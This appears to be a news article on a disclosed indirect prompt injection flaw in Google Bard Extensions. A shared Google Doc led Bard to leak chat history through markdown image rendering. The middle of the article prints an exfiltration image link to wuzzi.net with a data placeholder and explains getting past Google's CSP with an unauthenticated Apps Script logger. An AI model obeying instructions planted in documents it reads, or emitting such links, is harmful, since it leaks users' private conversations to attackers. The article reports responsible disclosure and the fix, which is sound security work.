Google Bard's secret to vulnerability: the technique of Prompt Injection, enabling hackers to crack AI systems using just natural language.
Large Language Models (LLMs), heavily reliant on prompt words for text generation, face their greatest strength and vulnerability in this attack technique, exploiting the indistinguishable nature of system and user-generated prompts in natural language. An attacker can mimic system commands, potentially revealing 'secrets' known only to the AI.
Prompt Injection attacks come in two forms: direct and indirect. Direct Prompt Injection involves users inputting malicious commands directly to the model, while indirect involves embedding such commands in documents that the model might retrieve.
Recently, Google Bard received significant updates, including Extensions, allowing access to YouTube, flight and hotel searches, and personal files and emails. With Bard's access to the 'Google ecosystem,' including Drive, Docs, and Gmail, it becomes susceptible to indirect prompt injections. Malicious actors could send emails or forcibly share Google Docs, triggering unintended actions by Bard.
Johann Rehberger, a former Microsoft Azure security engineer with 20 years of experience in security risk analysis, tested Bard's new version for data leakage risks under Prompt Injection attacks. He quickly validated the feasibility of Prompt Injection, demonstrating Bard's response to additional prompts in old YouTube videos and Google Docs, confirming the potential for further testing.
The Vulnerability of Bard: Image Markdown Injection
Upon discovering Bard's susceptibility to Prompt Injection, Johann delved deeper into its implications. A common vulnerability in Large Language Models (LLMs) is revealing chat history through hyperlinks and image rendering.
But what does this mean for Google Bard?
When Google's LLM returns text, it can include markdown elements, which Bard renders as HTML, including image rendering.
Imagine the LLM returning text like:
![Data Exfiltration in Progress](https://wuzzi.net/logo.png?goog=[DATA_EXFILTRATION])
This renders as an HTML image tag, automatically connecting the browser to the URL to load the image without user interaction.
<img src="https://wuzzi.net/logo.png?goog=[DATA_EXFILTRATION]">
Johann developed a prompt injection payload to read chat history and form a hyperlink containing it. However, circumventing Google's Content Security Policy (CSP) posed a challenge.
Bypassing Content Security Policy
Rendering images from an attacker-controlled server is tricky due to Google's CSP, which prevents loading images from arbitrary sources.
But a potential workaround exists.
Johann discovered that Google Apps Script might bypass the CSP. Similar to Office Macros, Apps Scripts run on script.google.com or googleusercontent.com domains.
Thus, Johann implemented the Bard Logger in Apps Script, writing all query parameters from the URL invocation to a Google Doc, serving as the data exfiltration destination.
Initially skeptical, Johann found a setting in the Apps Script UI that allowed unauthenticated access, setting the stage for a complete setup:
Bard's vulnerability to indirect prompt injection via Extensions
Bard's flaw allowing zero-click image rendering
A malicious Google Doc with prompt injection instructions
A logging endpoint on google.com to receive data when the image is loaded.
The Complete Data Leakage Process
Johann shared the comprehensive process he used to expose data leaks in Bard.
Initially, he engaged in routine conversation with Bard:
A user accessed a Google document (The Bard2000), leading to attacker-instructed prompt injections and image rendering.
The attacker then utilized a script within Apps Script to collect data into a Google document.
Here is the Google document Johann used for "Prompt Injection":
Google's Resolution
This security issue was reported to Google VRP on September 19, 2023.
By October 19, Johann inquired about the status of the vulnerability, intending to demonstrate it at Ekoparty 2023. Google confirmed the issue had been resolved. The specifics of Google's fix remain unclear, but the CSP was not altered, and image rendering is still possible. It suggests that Google may have implemented some filtering measures to prevent data insertion into URLs.
Comentários